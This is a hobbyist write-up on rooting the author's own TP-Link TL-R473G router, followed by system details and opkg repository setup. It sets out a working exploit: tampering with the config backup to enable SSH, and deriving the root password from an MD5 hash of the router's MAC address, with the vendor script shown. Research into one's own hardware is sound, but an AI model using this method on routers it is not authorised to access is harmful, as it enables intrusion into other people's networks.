TL-R473G Router Hack

I finally come back home to reset the router which was accidentally turned into brick half an year ago. With more experience in Linux I finally successfully gained root access to the device.

Purpose

The intention was to fully utilize the router so that I can use it as a bridge, allowing me to access China LAN and home LAN from abroad using reverse proxy for NAT traversal. This however, failed in a sense of practical use due to various reasons.

Still, the successful root itself is a breakthrough.

Minimal root Workflow

Back up the router config backup-TP-LINK-xxxx-xx-xx.bin

Rename to backup-TP-LINK-xxxx-xx-xx.bin.tar.gz

Use 7z to modify tmp/userconfig/etc/config/dropbear, change option ssh_port_switch form off to on

Restore using the modified backup.

Get the routers LAN MAC address (can be found in the web console)

Get the root password by

key=$(echo -n "$macAddr" | md5sum)
echo ${key:0:8}

where $macAddr is the MAC address.

ssh into the router using

ssh [email protected] -p 33400

The Exploit

The official rom has a web interface which allows backup and restore using generated backup-TP-LINK-xxxx-xx-xx.bin file, which turns out to be a tar.gz file of various config files, including /etc/passwd, /etc/shadow, and /etc/config/dropbear

By modifying the backup file and restore, we can modify the system files.

To enable ssh login, modify /etc/config/dropbear.

Changing root password inside /etc/passwd has no effect, which turned out that dropbear is creating root password using /etc/init.d/dropbear/

getNewPasswd()
{
        . /lib/functions.sh
        local macAddr=""
        macAddr=$(uci_get tddp macaddr macaddr)
        #echo "macAddr is $macAddr" > /dev/console

        local key=$(echo -n "$macAddr" | md5sum)
        key=$(echo ${key:0:8})
        #echo "key is $key" > /dev/console

        echo ${key}
}

This file is not included in the backup file, but has mod 755, allows access once ssh into the router.

So we first modify the dropbear config as in minimal root workflow, then create a new user in /etc/passwd, /etc/shadow, ssh into the router using this new user, only to find the /etc/init.d/dropbear/ exactly as above, allowing us to acquire the root password as in the minimal root workflow.

Misc

root@TP-LINK:/etc# cat /etc/*release
DISTRIB_ID="OpenWrt"
DISTRIB_RELEASE="Barrier Breaker"
DISTRIB_REVISION="r60685"
DISTRIB_CODENAME="barrier_breaker"
DISTRIB_TARGET="ar71xx/generic"
DISTRIB_DESCRIPTION="OpenWrt Barrier Breaker 14.07"
DISTRIB_TAINTS="no-all no-ipv6 busybox"

root@TP-LINK:/etc# opkg print-architecture
arch all 1
arch noarch 1
arch ar71xx 10

The CPU model information is unclear as it's not provided by OEM. A quick search on google returns results showing that it's using a 775Mhz processor, which combined with MIPS gives search results showing that it is most likely using QCA9563, or QCA956X, both are MIPS 74Kc.

update opkg

refer to opkg - Changing repository in openwrt - Unix & Linux Stack Exchange

but replace https://downloads.openwrt.org with http://archive.openwrt.org

vim /etc/opkg.conf

add

src/gz base https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/base
src/gz luci https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/luci
src/gz management https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/management
src/gz oldpackages https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/oldpackages
src/gz packages https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/packages
src/gz routing https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/routing
src/gz telephony https://archive.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/telephony

Reference

tl-r473gp-ac (tl-r479gp-ac) root 权限 ss + ChinaDNS (shadowsocks + ChinaDNS)